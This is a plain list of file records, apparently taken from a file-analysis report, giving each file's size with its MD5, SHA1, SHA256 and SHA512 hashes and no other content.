SHA256e74c9ca9007b6b43ff46783ecb393e6ec9ebbdf03f7c12a90c996d9331700a8b
SHA5128280f0f6afc69a82bc34e16637003afb61fee5d8f2cab80be7d66525623ec33f1449b0cc8c96df363c661bd9dbc7918a787ecafaaa5d2b85e6cafdcf0432d394
-
Filesize
65KB
MD5e52dbaeba8cd6cadf00fea19df63f0c1
SHA1c03f112ee2035d0eaab184ae5f9db89aca04273a
SHA256eaf60a9e979c95669d8f209f751725df385944f347142e0ecdcf2f794d005ead
SHA51210eef8fd49e2997542e809c4436ad35dcc6b8a4b9b4313ad54481daef5f01296c9c5f6dedad93fb620f267aef46b0208deffbad1903593fd26fd717a030e89e8
-
Filesize
1.4MB
MD5d220b7e359810266fe6885a169448fa0
SHA1556728b326318b992b0def059eca239eb14ba198
SHA256ca40732f885379489d75a2dec8eb68a7cce024f7302dd86d63f075e2745a1e7d
SHA5128f802c2e717b0cb47c3eeea990ffa0214f17d00c79ce65a0c0824a4f095bde9a3d9d85efb38f8f2535e703476cb6f379195565761a0b1d738d045d7bb2c0b542
-
Filesize
122KB
MD513efdd2d1bc1d8cbb009216c063be5a9
SHA1a5fce9deff282cdfdbefacab1221db7f6d316dae
SHA25645eae45501ee63df0c1ffc2f83291fbf5ab992c1c4eedce9c3f80f75bb0fb3e3
SHA512a03176969ff625c73d40aeeffc30ba3cbb0985035664335b8f45d3f50744f8bf01afebbdc2d289e2dd532b7f0d5097115a85b1caaa6043bbaa6478436448834f
-
Filesize
140KB
MD53089ce4ba32a6edcbbe033202a29f1b0
SHA1b56b51fb477d23f6c68c5a91e3af65c610da38da
SHA2565c9d8597bcc59e890c23ea88a1f8956250c5d96b9115de726e670d0428cfaf28
SHA512db4c7545d2ccf89b36503d2928732f0c028e1706294283766048175240cbb4f81ce601103e1b180a714713829a7249e99cf018560e1114a139312cb5f04b102d
-
Filesize
1.6MB
MD527515b5bb912701abb4dfad186b1da1f
SHA13fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
223KB
MD56eda5a055b164e5e798429dcd94f5b88
SHA12c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA51274283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e
-
Filesize
1.6MB
MD50b66c50e563d74188a1e96d6617261e8
SHA1cfd778b3794b4938e584078cbfac0747a8916d9e
SHA25602c665f77db6b255fc62f978aedbe2092b7ef1926836290da68fd838dbf2a9f2
SHA51237d710cb5c0ceb5957d11b61684cfbc65951c1d40ab560f3f3cb8feca42f9d43bd981a0ff44c3cb7562779264f18116723457e79e0e23852d7638b1a954a258f
-
Filesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
Filesize
25KB
MD51e9e36e61651c3ad3e91aba117edc8d1
SHA161ab19f15e692704139db2d7fb3ac00c461f9f8b
SHA2565a91ba7ea3cf48033a85247fc3b1083f497bc060778dcf537ca382a337190093
SHA512b367e00e1a8a3e7af42d997b59e180dfca7e31622558398c398f594d619b91cedc4879bfdda303d37f31dfcc3447faa88f65fd13bac109889cee8c1e3c1d62d0
-
Filesize
622KB
MD5c78fab9114164ac981902c44d3cd9b37
SHA1cb34dff3cf82160731c7da5527c9f3e7e7f113b7
SHA2564569acfa25dda192becda0d79f4254ce548a718b566792d73c43931306cc5242
SHA512bf82ccc02248be669fe4e28d8342b726cf52c4ec2bfe2ec1f71661528e2d8df03781ae5ccf005a6022d59a90e36cea7d3c7a495bd11bf149319c891c00ac669b
-
Filesize
295KB
MD5af87b4aa3862a59d74ff91be300ee9e3
SHA1e5bfd29f92c28afa79a02dc97a26ed47e4f199b4
SHA256fac71c7622957fe0773214c7432364d7fc39c5e12250ff9eaaeea4d897564dc7
SHA5121fb0b8100dffd18c433c4aa97a4f2da76ff6e62e2ef2139edc4f98603ba0bb1c27b310b187b5070cf4e892ffc2d09661a6914defa4509c99b60bcbb50f70f4a0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
293KB
MD50954fd792a9412c4a7877bfd4dde129f
SHA188138080b4b4be6617b8b1014bc3f5695ac985a5
SHA25653d16d6a599332cc8b61daf13b74d27f5b53049806515df64fa236673f911fc1
SHA5120ef0c84023c53b534fb4311054777b34c784cb21b795e1b71042140111c29750a75d955005a2b64cd5fb1ea02c66e953d0d899f1d123e3c1df64f42d3a07fe07
-
Filesize
4KB
MD5dcb5b62e0673720703325bb62f66a915
SHA12abf39a0f75f7f1992423f13569f458cb5869ebc
SHA2563269d4fd39f7b5d1d89b9f80182bf18575038d481c8d7f0898abe92533c3d7c6
SHA5126af87f0e58db519a40ecb5af2a506f81b9bc97374a4559ccfa1749e008c8ea8780df4fb0c4fbfde5a6306273240da6f41d6b92eda113eb5ab2db9687a4cd0f3c
-
Filesize
13KB
MD50d1b70fbbce81a2ade65547137b6ad78
SHA1d6f26f9f6368705d3455303f112744fda4c343a6
SHA256332a288cdbaeceaf1dea244e7b671f7af0bd2d9705a5c1068954596700233342
SHA51236c2eac78d52305c475a69c6d13d60ad2f903e6d9903d207d0998cac141ac70d7d762d9488bd44231e8076f601f3393fa8ad9e2f98aed08c2a8e98152da87abe
-
Filesize
14KB
MD5b34eb42243a83ef8847574680c15e30b
SHA17862cd0ffaeb4ebe91f2752043d752a7ab18d470
SHA256b08cb40b87301d92da8096bbad9b185962fd77f56c89fb5ddd59c63143306ad8
SHA5125432fa065376cbe2092d11816cefe39d8e2bd41542daa2ce4ec9a62f0bd6fc7e2664b1d550dab531dc037e2d093347aaed5a3d711c94eb65e453a6f7c193812d
-
Filesize
665KB
MD5ae3f084d4b1c4c19d3a157b0ad1b39a9
SHA140bfe50198646865c35ef959fd036843191b997a
SHA256b65c925e983d94efaa972496811726ed4f8a9caad2dd1612b32b0d7646db3f45
SHA5125f333111209e1764d685b7c4578fb47ba24b72113fcf8ad17c756abb998d66a634923117fc9dc9b1f38dcf597bb318f515d858cd07613327df676fc496f560af
-
Filesize
11KB
MD5f7b7516669f775dd6306cd2880b3f899
SHA1a055e8224af1b02fb34f5dbf21e826b60c3fa475
SHA2568bfe40011585ec8cd103a10b8d7cf33fd82d1989427dc8fbfff0533f18d2ea4d
SHA51238b625a673d2cc26a3f953ecede4413f2899f73ed23ccef13585cb43d2181afff2b4ea083a47d305765855d6bbed67f2e1d99fc6b99f4a932b8416ef0956cba0
-
Filesize
15KB
MD5feb5e864f456ea0d3f050d365a685f06
SHA15d0d6e13bb6c88c53d6f2efab6dec085cbdf73b0
SHA256d024af9341abda2d45c701ede1bf4f7c6128474f988d103426d5ba299298e54b
SHA5129776ab840654ee671537827cf4d97e5be171e7765227b4eb71c98eaa572574e232c3eebfb47a5990f7ed9c7b3fb331fb47e85deb9e5849d87b5919c0e8a71d35
-
Filesize
829KB
MD50101b384f108fba68391c0ac47c2cfb9
SHA1cfdcb355c8721d3d393db577b8d72fc1667e1b3b
SHA2562d92d1f439a66a196fcb4e8449860be112b4e3bd7faa4354f8f496f952b33f26
SHA512e81b1e4c5c1d728a952e1f30767713feaae52c5598d53b35213bdebc3621fca7fa1ed8e702ba8e09f408b4b540a485d42525b2a55502f664b886a7f0b4120f8f
-
Filesize
652B
MD59d9f9caacd230e99dbc2454bf5f54069
SHA1c652996a589cb9051683a4fa1c55960907932617
SHA2564fe9f456b5addfde002321e0ab7e851604d4348375004a175f53a474dd02369d
SHA512442c9366df77fb7d8a73ed47b5ccf741d98ac0cd60277d262ac01c4624b4c29dbb7aea2de2f846420a57d8b394544a0e7e6652ded0aef9bd3b814afe15f2d8d6
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5fe1cd48f720e3e8fed5e11f14e39020f
SHA1c7682b1658ccaa7abb49ad06fdb7312f490474a9
SHA25687c753a121fe3c61dc53276bc2b2e6c7f29670a928b44451f37cf5f4bdd6a22e
SHA512ec0a7097b70b2082e2c0dbbf0ec5dc2804edf9c4e6f685004e3bf5a1b3bd1369b675f18952dfd5e4d4bfe8db43138e57cf41c0f485ceee2976dd2bccafa0880a